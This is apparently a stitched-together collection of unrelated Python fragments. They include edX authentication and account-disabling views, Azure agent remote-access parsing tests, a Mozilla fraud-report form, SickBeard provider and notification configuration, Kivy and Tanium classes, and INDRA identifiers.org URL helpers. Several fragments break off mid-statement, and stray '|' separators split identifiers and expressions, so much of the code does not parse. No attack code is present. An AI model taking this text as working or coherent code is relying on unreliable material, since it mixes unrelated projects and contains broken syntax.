log.exception(exc)
raise
redirect_url = None # The AJAX method calling should know the default destination upon success
if third_party_auth_successful:
redirect_url = pipeline.get_complete_url(backend_name)
response = JsonResponse({
"success": True,
"redirect_url": redirect_url,
})
# Ensure that the external marketing site can
# detect that the user is logged in.
return set_logged_in_cookie(request, response)
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
else:
AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))
reactivation_email_for_user(user)
not_activated_msg = _("This account has not been activated. We have sent another activation message. Please check your email for the activation instructions.")
return JsonResponse({
"success": False,
"value": not_activated_msg,
}) # TODO: this should be status code 400 # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
    """
    Authenticate the client using an OAuth access token by using the token to
    retrieve information from a third party and matching that information to an
    existing user.

    Deprecated in favour of AccessTokenExchangeView. Responds 204 on success,
    401 for a bad token, 400 for a malformed request, 404 for an unsupported
    backend.
    """
    warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
    backend = request.backend
    # Only OAuth1/OAuth2 backends support token-based login.
    if isinstance(backend, social_oauth.BaseOAuth1) or isinstance(backend, social_oauth.BaseOAuth2):
        if "access_token" in request.POST:
            # Tell third party auth pipeline that this is an API call
            request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
            user = None
            try:
                user = backend.do_auth(request.POST["access_token"])
            except (HTTPError, AuthException):
                # Invalid/expired token or upstream failure: fall through to 401.
                pass
            # do_auth can return a non-User object if it fails
            if user and isinstance(user, User):
                login(request, user)
                return JsonResponse(status=204)
            else:
                # Ensure user does not re-enter the pipeline
                request.social_strategy.clean_partial_pipeline()
                return JsonResponse({"error": "invalid_token"}, status=401)
        else:
            return JsonResponse({"error": "invalid_request"}, status=400)
    raise Http404
@ensure_csrf_cookie
def logout_user(request):
    """
    HTTP request to log out the user. Redirects to marketing page.
    Deletes both the CSRF and sessionid cookies so the marketing
    site can determine the logged in state of the user
    """
    # We do not log here, because we have a handler registered
    # to perform logging on successful logouts.
    logout(request)
    if settings.FEATURES.get('AUTH_USE_CAS'):
        target = reverse('cas-logout')
    else:
        target = '/'
    response = redirect(target)
    # Clear the marketing-site login-indicator cookie on the shared domain.
    response.delete_cookie(
        settings.EDXMKTG_COOKIE_NAME,
        path='/', domain=settings.SESSION_COOKIE_DOMAIN,
    )
    return response
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
    """
    Renders the view used to manage user standing. Also displays a table
    of user accounts that have been disabled and who disabled them.

    Staff only: raises Http404 for non-staff users.
    """
    if not request.user.is_staff:
        raise Http404
    all_disabled_accounts = UserStanding.objects.filter(
        account_status=UserStanding.ACCOUNT_DISABLED
    )
    headers = ['username', 'account_changed_by']
    # One row per disabled account: the user and whoever disabled them.
    # (Comprehension replaces the former append loop; the intermediate
    # all_disabled_users list was unused elsewhere.)
    rows = [
        [standing.user.username, standing.user.standing.all()[0].changed_by]
        for standing in all_disabled_accounts
    ]
    context = {'headers': headers, 'rows': rows}
    return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
    """
    Ajax call to change user standing. Endpoint of the form
    in manage_user_standing.html
    """
    # Staff-only endpoint.
    if not request.user.is_staff:
        raise Http404
    context = {}

    # Validate inputs with early returns.
    username = request.POST.get('username')
    if username is None or username.strip() == '':
        context['message'] = _('Please enter a username')
        return JsonResponse(context, status=400)

    account_action = request.POST.get('account_action')
    if account_action is None:
        context['message'] = _('Please choose an option')
        return JsonResponse(context, status=400)

    username = username.strip()
    try:
        user = User.objects.get(username=username)
    except User.DoesNotExist:
        context['message'] = _("User with username {} does not exist").format(username)
        return JsonResponse(context, status=400)

    # `_success` avoids shadowing the gettext alias `_`.
    user_account, _success = UserStanding.objects.get_or_create(
        user=user, defaults={'changed_by': request.user},
    )
    if account_action == 'disable':
        user_account.account_status = UserStanding.ACCOUNT_DISABLED
        context['message'] = _("Successfully disabled {}'s account").format(username)
        log.info(u"%s disabled %s's account", request.user, username)
    elif account_action == 'reenable':
        user_account.account_status = UserStanding.ACCOUNT_ENABLED
        context['message'] = _("Successfully reenabled {}'s account").format(username)
        log.info(u"%s reenabled %s's account", request.user, username)
    else:
        context['message'] = _("Unexpected account status")
        return JsonResponse(context, status=400)

    user_account.changed_by = request.user
    user_account.standing_last_changed_at = datetime.datetime.now(UTC)
    user_account.save()
    return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
    """JSON call to change a profile setting: Right now, location"""
    # TODO (vshnayder): location is no longer used
    profile = UserProfile.objects.get(user=request.user)  # request.user.profile_cache
    new_location = request.POST.get('location')
    if new_location is not None:
        profile.location = new_location
        profile.save()
    return JsonResponse({
        "success": True,
        "location": profile.location,
    })
class AccountValidationError(Exception):
    """Validation error tied to a specific account field.

    Carries the name of the offending field so callers can report
    exactly which input failed validation.
    """
    def __init__(self, message, field):
        super(AccountValidationError, self).__init__(message)
        # Name of the account field that failed validation.
        self.field = field
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs):  # pylint: disable=unused-argument
    """
    handler that saves the user Signup Source
    when the user is created
    """
    # Only act on freshly created users, not updates.
    if not kwargs.get('created'):
        return
    site = microsite.get_value('SITE_NAME')
    if not site:
        return
    UserSignupSource(user=kwargs['instance'], site=site).save()
    log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form):
"""
Given cleaned post variables, create the User and UserProfile objects, as well as the
registration for this user.
Returns a tuple (User, UserProfile, Registration).
Note: this function is also used for creating test users.
"""
if not form.is_valid():
raise ValidationError(form.errors)
user = User(
username=form.cleaned_data["username"],
email=form.cleaned_data["email"],
is_active=False
)
user.set_password(form.cleaned_data["password"])
registration = Registration()
# TODO: Rearrange so that if part of the process fails, the whole process fails.
# Right now, we can have e.g. no registration e-mail sent out and a zombie account
try:
user.save()
except IntegrityError:
# Figure out the |
# Copyright Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" B | ASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import xml
from tests | .tools import *
from azurelinuxagent.common.protocol.wire import *
from azurelinuxagent.common.osutil import get_osutil
class TestRemoteAccess(AgentTestCase):
    """Tests for parsing RemoteAccess (JIT user access) goal-state data.

    Uses the modern assertEqual/assertNotEqual spellings; the plural
    assertEquals/assertNotEquals forms are deprecated aliases.
    """

    def test_parse_remote_access(self):
        # Single-account payload parses with the expected fields.
        data_str = load_data('wire/remote_access_single_account.xml')
        remote_access = RemoteAccess(data_str)
        self.assertNotEqual(None, remote_access)
        self.assertEqual("1", remote_access.incarnation)
        self.assertEqual(1, len(remote_access.user_list.users), "User count does not match.")
        self.assertEqual("testAccount", remote_access.user_list.users[0].name, "Account name does not match")
        self.assertEqual("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
        self.assertEqual("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")

    @patch('azurelinuxagent.common.protocol.wire.WireClient.get_goal_state',
           return_value=GoalState(load_data('wire/goal_state.xml')))
    def test_update_remote_access_conf_no_remote_access(self, _):
        # Goal state without remote access config should be a no-op.
        protocol = WireProtocol('12.34.56.78')
        goal_state = protocol.client.get_goal_state()
        protocol.client.update_remote_access_conf(goal_state)

    def test_parse_two_remote_access_accounts(self):
        data_str = load_data('wire/remote_access_two_accounts.xml')
        remote_access = RemoteAccess(data_str)
        self.assertNotEqual(None, remote_access)
        self.assertEqual("1", remote_access.incarnation)
        self.assertEqual(2, len(remote_access.user_list.users), "User count does not match.")
        self.assertEqual("testAccount1", remote_access.user_list.users[0].name, "Account name does not match")
        self.assertEqual("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
        self.assertEqual("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")
        self.assertEqual("testAccount2", remote_access.user_list.users[1].name, "Account name does not match")
        self.assertEqual("encryptedPasswordString", remote_access.user_list.users[1].encrypted_password, "Encrypted password does not match.")
        self.assertEqual("2019-01-01", remote_access.user_list.users[1].expiration, "Expiration does not match.")

    def test_parse_ten_remote_access_accounts(self):
        data_str = load_data('wire/remote_access_10_accounts.xml')
        remote_access = RemoteAccess(data_str)
        self.assertNotEqual(None, remote_access)
        self.assertEqual(10, len(remote_access.user_list.users), "User count does not match.")

    def test_parse_duplicate_remote_access_accounts(self):
        # Duplicates are preserved as-is by the parser (no de-duplication).
        data_str = load_data('wire/remote_access_duplicate_accounts.xml')
        remote_access = RemoteAccess(data_str)
        self.assertNotEqual(None, remote_access)
        self.assertEqual(2, len(remote_access.user_list.users), "User count does not match.")
        self.assertEqual("testAccount", remote_access.user_list.users[0].name, "Account name does not match")
        self.assertEqual("encryptedPasswordString", remote_access.user_list.users[0].encrypted_password, "Encrypted password does not match.")
        self.assertEqual("2019-01-01", remote_access.user_list.users[0].expiration, "Expiration does not match.")
        self.assertEqual("testAccount", remote_access.user_list.users[1].name, "Account name does not match")
        self.assertEqual("encryptedPasswordString", remote_access.user_list.users[1].encrypted_password, "Encrypted password does not match.")
        self.assertEqual("2019-01-01", remote_access.user_list.users[1].expiration, "Expiration does not match.")

    def test_parse_zero_remote_access_accounts(self):
        data_str = load_data('wire/remote_access_no_accounts.xml')
        remote_access = RemoteAccess(data_str)
        self.assertNotEqual(None, remote_access)
        self.assertEqual(0, len(remote_access.user_list.users), "User count does not match.")

    @patch('azurelinuxagent.common.protocol.wire.WireClient.get_goal_state',
           return_value=GoalState(load_data('wire/goal_state_remote_access.xml')))
    @patch('azurelinuxagent.common.protocol.wire.WireClient.fetch_config',
           return_value=load_data('wire/remote_access_single_account.xml'))
    @patch('azurelinuxagent.common.protocol.wire.WireClient.get_header_for_cert')
    def test_update_remote_access_conf_remote_access(self, _1, _2, _3):
        # With a remote-access goal state, the client caches the parsed config.
        protocol = WireProtocol('12.34.56.78')
        goal_state = protocol.client.get_goal_state()
        protocol.client.update_remote_access_conf(goal_state)
        self.assertNotEqual(None, protocol.client.remote_access)
        self.assertEqual(1, len(protocol.client.remote_access.user_list.users))
        self.assertEqual('testAccount', protocol.client.remote_access.user_list.users[0].name)
        self.assertEqual('encryptedPasswordString', protocol.client.remote_access.user_list.users[0].encrypted_password)

    def test_parse_bad_remote_access_data(self):
        # Non-XML input must raise an ExpatError from the parser.
        data = "foobar"
        self.assertRaises(xml.parsers.expat.ExpatError, RemoteAccess, data)
# coding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django import forms
from lib.l10n_utils.dotlang import _, _lazy
from bedrock.mozorg.forms import HoneyPotWidget
FRAUD_REPORT_FILE_SIZE_LIMIT = 5242880  # max attachment size in bytes: 5MB (5 * 1024 * 1024)
class FraudReportForm(forms.Form):
    """Form for reporting fraudulent/abusive use of Mozilla products.

    All user-facing strings are lazily translated. ``superpriority`` is a
    honeypot field: any value submitted there rejects the whole form.
    """
    input_url = forms.URLField(
        max_length=40,
        required=True,
        error_messages={
            'required': _lazy(u'Please enter a URL.'),
        },
        widget=forms.TextInput(
            attrs={
                'size': 40,
                'placeholder': _lazy(u'http://offendingsite.com'),
                'class': 'required fill-width',
                'required': 'required',
                'aria-required': 'true',
            }
        )
    )
    input_category = forms.ChoiceField(
        choices=(
            ('Charging for software', _lazy(u'Charging for software')),
            ('Collecting personal information', _lazy(u'Collecting personal information')),
            ('Domain name violation', _lazy(u'Domain name violation')),
            ('Logo misuse/modification', _lazy(u'Logo misuse/modification')),
            ('Distributing modified Firefox/malware', _lazy(u'Distributing modified Firefox/malware')),
        ),
        required=True,
        error_messages={
            'required': _lazy('Please select a category.'),
        },
        widget=forms.Select(
            attrs={
                'title': _lazy(u'Category'),
                'class': 'required',
                'required': 'required',
                'aria-required': 'true',
            }
        )
    )
    input_product = forms.ChoiceField(
        choices=(
            ('Firefox', _lazy(u'Firefox')),
            ('SeaMonkey', _lazy(u'SeaMonkey')),
            ('Thunderbird', _lazy(u'Thunderbird')),
            ('Other Mozilla Product/Project', _lazy(u'Other Mozilla Product/Project (specify)')),
        ),
        required=True,
        error_messages={
            'required': _lazy('Please select a product.'),
        },
        widget=forms.Select(
            attrs={
                'title': _lazy(u'Product'),
                'class': 'required',
                'required': 'required',
                'aria-required': 'true',
            }
        )
    )
    # Free-text product name when "Other Mozilla Product/Project" is chosen.
    input_specific_product = forms.CharField(
        max_length=80,
        required=False,
        widget=forms.TextInput(
            attrs={
                'size': 20,
                'class': 'fill-width'
            }
        )
    )
    input_details = forms.CharField(
        required=False,
        widget=forms.Textarea(
            attrs={
                'rows': '',
                'cols': '',
                'class': 'fill-width'
            }
        )
    )
    input_attachment = forms.FileField(
        required=False,
    )
    input_attachment_desc = forms.CharField(
        max_length=40,
        required=False,
        widget=forms.Textarea(
            attrs={
                'rows': '',
                'cols': '',
                'class': 'fill-width'
            }
        )
    )
    input_email = forms.EmailField(
        max_length=80,
        required=False,
        error_messages={
            'invalid': _lazy(u'Please enter a valid email address'),
        },
        widget=forms.TextInput(
            attrs={
                'size': 20,
                'class': 'fill-width'
            }
        )
    )
    # Honeypot: hidden from humans; bots filling it trigger a validation error.
    superpriority = forms.BooleanField(widget=HoneyPotWidget, required=False)

    def clean_input_attachment(self):
        """Reject attachments larger than FRAUD_REPORT_FILE_SIZE_LIMIT (5MB)."""
        # Field-level clean methods should read self.cleaned_data directly
        # rather than re-running the whole-form clean() via super.
        attachment = self.cleaned_data.get("input_attachment")
        if attachment:
            # Use the public UploadedFile.size API instead of the private
            # ``_size`` attribute.
            if attachment.size > FRAUD_REPORT_FILE_SIZE_LIMIT:
                raise forms.ValidationError(
                    _("Attachment must not exceed 5MB"))
        return attachment

    def clean_superpriority(self):
        """Honeypot check: any truthy value means a bot filled the form."""
        honeypot = self.cleaned_data.pop('superpriority', None)
        if honeypot:
            raise forms.ValidationError(
                _('Your submission could not be processed'))
|
rProvider == 'tvtorrents':
sickbeard.TVTORRENTS = curEnabled
elif curProvider == 'torrentleech':
sickbeard.TORRENTLEECH = curEnabled
elif curProvider == 'btn':
sickbeard.BTN = curEnabled
elif curProvider == 'binnewz':
sickbeard.BINNEWZ = curEnabled
elif curProvider == 't411':
sickbeard.T411 = curEnabled
elif curProvider == 'ftdb':
sickbeard.FTDB = curEnabled
elif curProvider == 'addict':
sickbeard.ADDICT = curEnabled
elif curProvider == 'fnt':
sickbeard.FNT = curEnabled
elif curProvider == 'libertalia':
sickbeard.LIBERTALIA = curEnabled
elif curProvider == 'xthor':
sickbeard.XTHOR = curEnabled
elif curProvider == 'thinkgeek':
sickbeard.THINKGEEK = curEnabled
elif curProvider == 'cpasbien':
sickbeard.Cpasbien = curEnabled
elif curProvider == 'kat':
sickbeard.kat = curEnabled
elif curProvider == 'piratebay':
sickbeard.THEPIRATEBAY = curEnabled
elif curProvider == 'ethor':
sickbeard.ETHOR = curEnabled
elif curProvider in newznabProviderDict:
newznabProviderDict[curProvider].enabled = bool(curEnabled)
else:
logger.log(u"don't know what " + curProvider + " is, skipping")
sickbeard.TVTORRENTS_DIGEST = tvtorrents_digest.strip()
sickbeard.TVTORRENTS_HASH = tvtorrents_hash.strip()
sickbeard.TORRENTLEECH_KEY = torrentleech_key.strip()
sickbeard.ETHOR_KEY = ethor_key.strip()
sickbeard.BTN_API_KEY = btn_api_key.strip()
sickbeard.T411_USERNAME = t411_username
sickbeard.T411_PASSWORD = t411_password
sickbeard.FTDB_USERNAME = ftdb_username
sickbeard.FTDB_PASSWORD = ftdb_password
sickbeard.ADDICT_USERNAME = addict_username
sickbeard.ADDICT_PASSWORD = addict_password
sickbeard.FNT_USERNAME = fnt_username
sickbeard.FNT_PASSWORD = fnt_password
sickbeard.LIBERTALIA_USERNAME = libertalia_username
sickbeard.LIBERTALIA_PASSWORD = libertalia_password
sickbeard.XTHOR_USERNAME = xthor_username
sickbeard.XTHOR_PASSWORD = xthor_password
sickbeard.THINKGEEK_USERNAME = thinkgeek_username
sickbeard.THINKGEEK_PASSWORD = thinkgeek_password
sickbeard.NZBSRUS_UID = nzbs_r_us_uid.strip()
sickbeard.NZBSRUS_HASH = nzbs_r_us_hash.strip()
sickbeard.OMGWTFNZBS_UID = omgwtfnzbs_uid.strip()
sickbeard.OMGWTFNZBS_KEY = omgwtfnzbs_key.strip()
sickbeard.PROVIDER_ORDER = provider_list
sickbeard.save_config()
if len(results) > 0:
for x in results:
logger.log(x, logger.ERROR)
ui.notifications.error('Error(s) Saving Configuration',
'<br />\n'.join(results))
else:
ui.notifications.message('Configuration Saved', ek.ek(os.path.join, sickbeard.CONFIG_FILE) )
redirect("/config/providers/")
class ConfigNotifications:
@cherrypy.expose
def index(self):
t = PageTemplate(file="config_notifications.tmpl")
t.submenu = ConfigMenu
return _munge(t)
@cherrypy.expose
def saveNotifications(self, use_xbmc=None, xbmc_notify_onsnatch=None, xbmc_notify_ondownload=None, xbmc_update_onlyfirst=None, xbmc_notify_onsubtitledownload=None,
xbmc_update_library=None, xbmc_update_full=None, xbmc_host=None, xbmc_username=None, xbmc_password=None,
use_plex=None, plex_notify_onsnatch=None, plex_notify_ondownload=None, plex_notify_onsubtitledownload=None, plex_update_library=None,
plex_server_host=None, plex_host=None, plex_username=None, plex_password=None,
use_growl=None, growl_notify_onsnatch=None, growl_notify_ondownload=None, growl_notify_onsubtitledownload=None, growl_host=None, growl_password=None,
use_prowl=None, prowl_notify_onsnatch=None, prowl_notify_ondownload=None, prowl_notify_onsubtitledownload=None, prowl_api=None, prowl_priority=0,
use_twitter=None, twitter_notify_onsnatch=None, twitter_notify_ondownload=None, twitter_notify_onsubtitledownload=None,
use_boxcar=None, boxcar_notify_onsnatch=None, boxcar_notify_ondownload=None, boxcar_notify_onsubtitledownload=None, boxcar_username=None,
use_boxcar2=None, boxcar2_notify_onsnatch=None, boxcar2_notify_ondownload=None, boxcar2_notify_onsubtitledownload=None, boxcar2_access_token=None, boxcar2_sound=None,
use_pushover=None, pushover_notify_onsnatch=None, pushover_notify_ondownload=None, pushover_notify_onsubtitledownload=None, pushover_userkey=None, pushover_prio=None,
use_libnotify=None, libnotify_notify_onsnatch=None, libnotify_notify_ondownload=None, libnotify_notify_onsubtitledownload=None,
use_nmj=None, nmj_host=None, nmj_database=None, nmj_mount=None, use_synoindex=None,
use_nmjv2=None, nmjv2_host=None, nmjv2_dbloc=None, nmjv2_database=None,
use_trakt=None, trakt_username=None, trakt_password=None, trakt_api=None,trakt_remove_watchlist=None,trakt_use_watchlist=None,trakt_start_paused=None,trakt_method_add=None,
use_betaseries=None, betaseries_username=None, betaseries_password=None,
use_synologynotifier=None, synologynotifier_notify_onsnatch=None, synologynotifier_notify_ondownload=None, synologynotifier_notify_onsubtitledownload=None,
use_pytivo=None, pytivo_notify_onsnatch=None, pytivo_notify_ondownload=None, pytivo_notify_onsubtitledownload=None, pytivo_update_library=None,
pytivo_host=None, pytivo_share_name=None, pytivo_tivo_name=None,
use_nma=None, nma_notify_onsnatch=None, nma_notify_ondownload=None, nma_notify_onsubtitledownload=None, nma_api=None, nma_priority=0,
use_pushalot=None, pushalot_notify_onsnatch=None, pushalot_notify_ondownload=None, pushalot_notify_onsubtitledownload=None, pushalot_authorizationtoken=None,
use_pushbullet=None, pushbullet_notify_onsnatch=None, pushbullet_notify_ondownload=None, pushbullet_notify_onsubtitledownload=None, pushbullet_api=None, pushbullet_device=None, pushbullet_device_list=None, pushbullet_channel_list=None,
use_mail=None, mail_username=None, mail_password=None, mail_server=None, mail_ssl=None, mail_from=None, mail_to=None, mail_notify_onsnatch=None ):
results = []
if xbmc_notify_onsnatch == "on":
xbmc_notify_onsnatch = 1
else:
xbmc_notify_onsnatch = 0
if xbmc_notify_ondownload == "on":
xbmc_notify_ondownload = 1
else:
xbmc_notify_ondownload = 0
if xbmc_notify_onsubtitledownload == "on":
xbmc_notify_onsubtitledownload = 1
else:
xbmc_notify_onsubtitledownload = 0
if xbmc_update_library == "on":
xbmc_update_library = 1
else:
xbmc_update_library = 0
if xbmc_update_full == "on":
xbmc_update_full = 1
else:
xbmc_update_full = 0
if xbmc_update_onlyfirst == "on":
xbmc_update_onlyfirst = 1
else:
xbmc_up | date_onlyfirst = 0
if use_xbmc == "on":
use_xbmc = 1
else:
use_xbmc = 0
| if plex_update_library == "on":
plex_update_library = 1
else:
plex_update_library = 0
if plex_notify_onsnatch == "on":
plex_n |
# coding: utf-8
# Copyright (c) 2015 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE file)
from kivy.uix.label import Label
from gravur.utils import l | oad_widget
@load_widget
class LabelBox(Label):
    """Kivy ``Label`` subclass decorated with ``load_widget`` (see
    gravur.utils); adds no behavior of its own."""
    pass
|
# Copyright (c) 2015 Tanium Inc
#
# Generated from console.wsdl version 0.0.1
#
#
from .base import BaseType
class SavedActionApproval(BaseType):
    """SOAP object wrapper for the ``saved_action_approval`` tag
    (generated from console.wsdl)."""
    _soap_tag = 'saved_action_approval'
    def __init__(self):
        # Register this type's property schema with the BaseType machinery.
        # NOTE: MetadataList is imported at the bottom of the module (see the
        # trailing import); it is only resolved here at call time.
        BaseType.__init__(
            self,
            simple_properties={'id': int,
                               'name': str,
                               'approved_flag': int},
            complex_properties={'metadata': MetadataList},
            list_properties={},
        )
        # Instance values start unset; populated when parsed from SOAP.
        self.id = None
        self.name = None
        self.approved_flag = None
        self.metadata = None
from metadata_list import MetadataList
|
urn mapping
else:
return identifiers_ns.upper()
def get_ns_id_from_identifiers(identifiers_ns, identifiers_id):
    """Return a namespace/ID pair compatible with INDRA from identifiers.

    Parameters
    ----------
    identifiers_ns : str
        An identifiers.org standard namespace.
    identifiers_id : str
        An identifiers.org standard ID in the given namespace.

    Returns
    -------
    (str, str)
        A namespace and ID that are valid in INDRA db_refs.
    """
    reg_entry = identifiers_registry.get(identifiers_ns.lower())
    db_ns = get_ns_from_identifiers(identifiers_ns)
    if db_ns is None:
        return None, None
    db_id = identifiers_id
    # Some namespaces require the prefix embedded in the ID itself; add it if
    # missing. Guard against a namespace that maps to an INDRA ns but has no
    # registry entry (reg_entry would be None and unsubscriptable).
    if reg_entry and reg_entry['namespace_embedded']:
        if not identifiers_id.startswith(identifiers_ns.upper()):
            db_id = '%s:%s' % (identifiers_ns.upper(), identifiers_id)
    return db_ns, db_id
def get_identifiers_ns(db_name):
    """Map an INDRA namespace to an identifiers.org namespace when possible.

    Example: this can be used to map 'UP' to 'uniprot'.

    Parameters
    ----------
    db_name : str
        An INDRA namespace to map to identifiers.org

    Returns
    -------
    str or None
        An identifiers.org namespace or None if not available.
    """
    candidate = identifiers_mappings.get(db_name, db_name.lower())
    # Only return namespaces actually present in the registry.
    return candidate if candidate in identifiers_registry else None
def get_url_prefix(db_name):
    """Return the URL prefix for a given namespace."""
    identifiers_ns = get_identifiers_ns(db_name)
    if identifiers_ns is None:
        # Not an identifiers.org namespace: fall back to the hard-coded
        # prefix table (None when unknown).
        return url_prefixes.get(db_name)
    entry = identifiers_registry.get(identifiers_ns)
    if entry['namespace_embedded']:
        # ID already carries the namespace, so the prefix is just the base URL.
        return '%s/' % identifiers_url
    return '%s/%s:' % (identifiers_url, identifiers_ns.lower())
def get_identifiers_url(db_name, db_id):
    """Return an identifiers.org URL for a given database name and ID.
    Parameters
    ----------
    db_name : str
        An internal database name: HGNC, UP, CHEBI, etc.
    db_id : str
        An identifier in the given database.
    Returns
    -------
    url : str
        An identifiers.org URL corresponding to the given database name and ID.
    """
    # This is the case where we have a prefix that we can simply attach the
    # db_id to to get the desired URL.
    if db_name == 'CHEMBL':
        db_id = ensure_chembl_prefix(db_id)
    elif db_name == 'CHEBI':
        db_id = ensure_chebi_prefix(db_id)
    prefix = get_url_prefix(db_name)
    if prefix:
        return '%s%s' % (prefix, db_id)
    # Otherwise, we have to handle some special cases
    bel_scai_url = 'https://arty.scai.fraunhofer.de/artifactory/bel/namespace/'
    if db_name == 'LINCS':
        # LINCS IDs are disambiguated by their prefix into small molecule,
        # cell line, or (by default) protein sub-namespaces.
        if db_id.startswith('LSM-'):  # Lincs Small Molecule ID
            url = identifiers_url + '/lincs.smallmolecule:%s' % db_id
        elif db_id.startswith('LCL-'):  # Lincs Cell Line ID
            url = identifiers_url + '/lincs.cell:%s' % db_id
        else:  # Assume LINCS Protein
            url = identifiers_url + '/lincs.protein:%s' % db_id
    elif db_name == 'CHEMBL':
        # NOTE(review): normally unreachable when CHEMBL resolves to a prefix
        # above; presumably kept as a defensive fallback — confirm.
        if not db_id.startswith('CHEMBL'):
            db_id = 'CHEMBL%s' % db_id
        url = identifiers_url + '/chembl.compound:%s' % db_id
    elif db_name == 'HMS-LINCS':
        url = 'http://lincs.hms.harvard.edu/db/sm/%s-101' % db_id
    # Special cases with no identifiers entry
    elif db_name == 'SCHEM':
        url = bel_scai_url + 'selventa-legacy-chemicals/' + \
            'selventa-legacy-chemicals-20150601.belns'
    elif db_name == 'SCOMP':
        url = bel_scai_url + 'selventa-named-complexes/' + \
            'selventa-named-complexes-20150601.belns'
    elif db_name == 'SFAM':
        url = bel_scai_url + 'selventa-protein-families/' + \
            'selventa-protein-families-20150601.belns'
    elif db_name == 'TEXT' or db_name == 'TEXT_NORM':
        # Raw text groundings have no resolvable URL.
        return None
    else:
        logger.warning('Unhandled name space %s' % db_name)
        url = None
    return url
def parse_identifiers_url(url):
    """Retrieve database name and ID given the URL.

    Parameters
    ----------
    url : str
        An identifiers.org URL to parse.

    Returns
    -------
    db_name : str
        An internal database name: HGNC, UP, CHEBI, etc. corresponding to the
        given URL.
    db_id : str
        An identifier in the database.
    """
    # Try matching by string pattern
    db_ns, db_id = None, None
    # Dots in the hostname are escaped so '.' matches only a literal dot
    # (previously the unescaped dots matched any character).
    url_pattern = \
        r'(?:https?)://identifiers\.org/([A-Za-z0-9.-]+)(/|:)([A-Za-z0-9:_.-]+)'
    match = re.match(url_pattern, url)
    if match is not None:
        g = match.groups()
        if len(g) == 3:
            pattern_ns, pattern_id = g[0], g[2]
            db_ns, db_id = get_ns_id_from_identifiers(pattern_ns, pattern_id)
            # INDRA HGNC IDs are stored without the 'HGNC:' prefix.
            if db_ns == 'HGNC':
                if db_id.startswith('HGNC:'):
                    db_id = db_id[5:]
            # If we got UP and UPPRO, return UPPRO
            if db_ns == 'UP' and '#PRO_' in url:
                db_ns = 'UPPRO'
                db_id = url[url.find('PRO_'):]
            if db_ns and db_id:
                return db_ns, db_id
    # Fall back to the table of non-identifiers.org prefixes.
    for ns, prefix in url_prefixes.items():
        if url.startswith(prefix):
            return ns, url[len(prefix):]
    # Handle other special cases
    for part in ['/lincs.smallmolecule', '/lincs.cell', '/lincs.protein']:
        if part in url:
            return 'LINCS', url[(url.find(part) + len(part) + 1):]
    if '/chembl.compound' in url:
        return 'CHEMBL', url[
            (url.find('/chembl.compound') + len('/chembl.compound:')):]
    if 'lincs.hms.harvard.edu' in url:
        # Strip the fixed '-101' suffix appended when building these URLs.
        return 'HMS-LINCS', url[len('http://lincs.hms.harvard.edu/db/sm/'):-4]
    if 'selventa-legacy-chemicals/' in url:
        return 'SCHEM', None
    if 'selventa-named-complexes/' in url:
        return 'SCOMP', None
    if 'selventa-protein-families/' in url:
        return 'SFAM', None
    else:
        logger.warning('Could not parse URL %s' % url)
    return None, None
def namespace_embedded(db_ns: str) -> bool:
    """Return true if this namespace requires IDs to have namespace embedded.

    This function first maps the given namespace to an identifiers.org
    namespace and then checks the registry to see if namespaces need
    to be embedded in IDs. If yes, it returns True. If not, or the ID can't
    be mapped to identifiers.org, it returns False

    Parameters
    ----------
    db_ns :
        The namespace to check.

    Returns
    -------
    :
        True if the namespace is known to be embedded in IDs of this
        namespace. False if unknown or known not to be embedded.
    """
    identifiers_ns = get_identifiers_ns(db_ns)
    if not identifiers_ns:
        # Unknown to identifiers.org: assume not embedded.
        return False
    entry = identifiers_registry.get(identifiers_ns)
    return bool(entry['namespace_embedded'])
def ensure_prefix_if_needed(db_ns: str, db_id: str) -> str:
    """Return an ID ensuring a namespace prefix if known to be needed.

    Parameters
    ----------
    db_ns :
        The namespace associated with the identifier.
    db_id :
        The original identifier.

    Returns
    -------
    :
        The identifier with namespace embedded if needed.
    """
    # Delegate the embedding decision to namespace_embedded.
    return ensure_prefix(db_ns, db_id) if namespace_embedded(db_ns) else db_id
def ensure_prefix(db_ns, db_id, with_colon=True):
"""Return a valid ID that has the given namespace embedded.
This is useful for namespaces such as CHEBI, GO or BTO that require
the namespace to be part of the ID. Note that this function always
ensures that the given db_ns is embedded in the ID and can handle the
case whene it's already present.
Parameters
----------
db_ns : str
A namespace.
db_id : str
An ID within that namespace which should have the namespace
as a prefix in it.
with_colon: Optional[bool]
If True, the namespace prefix is followed by a colon in |
if x | () and y( | ) and z():
a()
else:
b()
|
def action_comment_load_more(context, action, entity_type, entity_id, last_id, parent_id, **args):
    """Ajax handler: load up to 10 more comments older than *last_id* for the
    given entity/parent thread, and rebuild the "more comments" placeholder.

    Sets ``context.response`` to a PartialResponse keyed by the placeholder id.
    """
    try:
        entity = IN.entitier.load_single(entity_type, int(entity_id))
        if not entity:
            return
        output = Object()
        db = IN.db
